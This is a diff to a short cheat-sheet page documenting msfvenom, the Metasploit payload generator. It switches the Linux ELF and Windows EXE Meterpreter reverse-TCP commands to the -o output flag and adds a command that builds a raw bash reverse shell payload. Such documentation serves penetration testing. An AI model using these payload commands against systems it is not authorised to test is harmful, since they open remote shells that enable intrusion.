diff --git a/pages/common/msfvenom.md b/pages/common/msfvenom.md index e6f298a28..455358176 100644 --- a/pages/common/msfvenom.md +++ b/pages/common/msfvenom.md @@ -17,8 +17,12 @@ - Create an ELF binary with a reverse TCP handler: -`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf > {{path/to/binary}}` +`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf -o {{path/to/binary}}` - Create an EXE binary with a reverse TCP handler: -`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe > {{path/to/binary.exe}}` +`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe -o {{path/to/binary.exe}}` + +- Create a raw bash with a reverse TCP handler: + +`msfvenom -p cmd/unix/reverse_bash LHOST={{local_ip}} LPORT={{local_port}} -f raw`